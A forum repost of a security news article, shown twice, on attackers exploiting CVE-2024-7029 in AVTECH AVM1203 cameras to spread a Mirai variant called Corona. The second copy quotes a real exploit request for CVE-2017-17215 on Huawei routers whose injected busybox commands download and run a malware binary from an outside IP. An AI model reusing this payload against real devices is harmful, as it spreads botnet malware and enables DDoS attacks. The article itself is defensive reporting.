Friend
Professional
- Messages
- 2,653
- Reaction score
- 851
- Points
- 113
The problem has been known for 5 years, but experts began to sound the alarm only now.
Akamai has detected a new wave of attacks on outdated security cameras from the Taiwanese manufacturer AVTECH. Attackers exploit a critical vulnerability in the AVM1203 model to spread malware from the Mirai family.
The vulnerability, identified as CVE-2024-7029, allows remote execution of arbitrary code on the device. Despite the fact that the problem has been known for about 5 years, it was officially recognized and registered only this month. Akamai experts have recorded the active use of this gap by hackers since March of this year. To detect the attacks, the researchers deployed a network of traps that mimic vulnerable cameras on the Internet.
The Mirai botnet first made a name for itself in 2016, when it was used to carry out a powerful DDoS attack on the website of cybersecurity expert Brian Krebs. In the weeks that followed, it was used to attack ISPs and other targets. One of these attacks on the DNS provider Dyn led to large-scale failures in the operation of many popular web services.
The situation was complicated by the fact that the creators of Mirai published the source code of the malware, which allowed almost anyone to create their own variations for DDoS attacks of unprecedented power. According to Kyle Lefton, a researcher with Akamai's threat response team, they have observed DDoS attacks using infected cameras on "various organizations." At the same time, there is no evidence yet that attackers use cameras to spy or view a video stream.
The exploited vulnerability is related to incorrect processing of the brightness parameter in the request to the /cgi-bin/supervisor/Factory.cgi file. This allows you to inject malicious commands. The attack downloads a JavaScript file to the device, which then downloads and executes the main payload - a Mirai variant called Corona. After infecting the device, the malware tries to spread further by connecting via Telnet to other hosts. In addition, it exploits a number of other vulnerabilities, including RCE in Hadoop YARN, CVE-2014-8361, and CVE-2017-17215.
Here's an example of code used to exploit the vulnerability in Huawei routers:
Since the vulnerable camera model is AVM1203 no longer supported by the manufacturer, experts recommend that users abandon its use altogether and replace it with more modern devices. In addition, experts once again remind of the need to change standard credentials on all devices connected to the Internet.
Source
Akamai has detected a new wave of attacks on outdated security cameras from the Taiwanese manufacturer AVTECH. Attackers exploit a critical vulnerability in the AVM1203 model to spread malware from the Mirai family.
The vulnerability, identified as CVE-2024-7029, allows remote execution of arbitrary code on the device. Despite the fact that the problem has been known for about 5 years, it was officially recognized and registered only this month. Akamai experts have recorded the active use of this gap by hackers since March of this year. To detect the attacks, the researchers deployed a network of traps that mimic vulnerable cameras on the Internet.
The Mirai botnet first made a name for itself in 2016, when it was used to carry out a powerful DDoS attack on the website of cybersecurity expert Brian Krebs. In the weeks that followed, it was used to attack ISPs and other targets. One of these attacks on the DNS provider Dyn led to large-scale failures in the operation of many popular web services.
The situation was complicated by the fact that the creators of Mirai published the source code of the malware, which allowed almost anyone to create their own variations for DDoS attacks of unprecedented power. According to Kyle Lefton, a researcher with Akamai's threat response team, they have observed DDoS attacks using infected cameras on "various organizations." At the same time, there is no evidence yet that attackers use cameras to spy or view a video stream.
The exploited vulnerability is related to incorrect processing of the brightness parameter in the request to the /cgi-bin/supervisor/Factory.cgi file. This allows you to inject malicious commands. The attack downloads a JavaScript file to the device, which then downloads and executes the main payload - a Mirai variant called Corona. After infecting the device, the malware tries to spread further by connecting via Telnet to other hosts. In addition, it exploits a number of other vulnerabilities, including RCE in Hadoop YARN, CVE-2014-8361, and CVE-2017-17215.
Here's an example of code used to exploit the vulnerability in Huawei routers:
Code:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\" $(/bin/busybox wget -g 45.14.244[.] 89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)Since the vulnerable camera model is AVM1203 no longer supported by the manufacturer, experts recommend that users abandon its use altogether and replace it with more modern devices. In addition, experts once again remind of the need to change standard credentials on all devices connected to the Internet.
Source
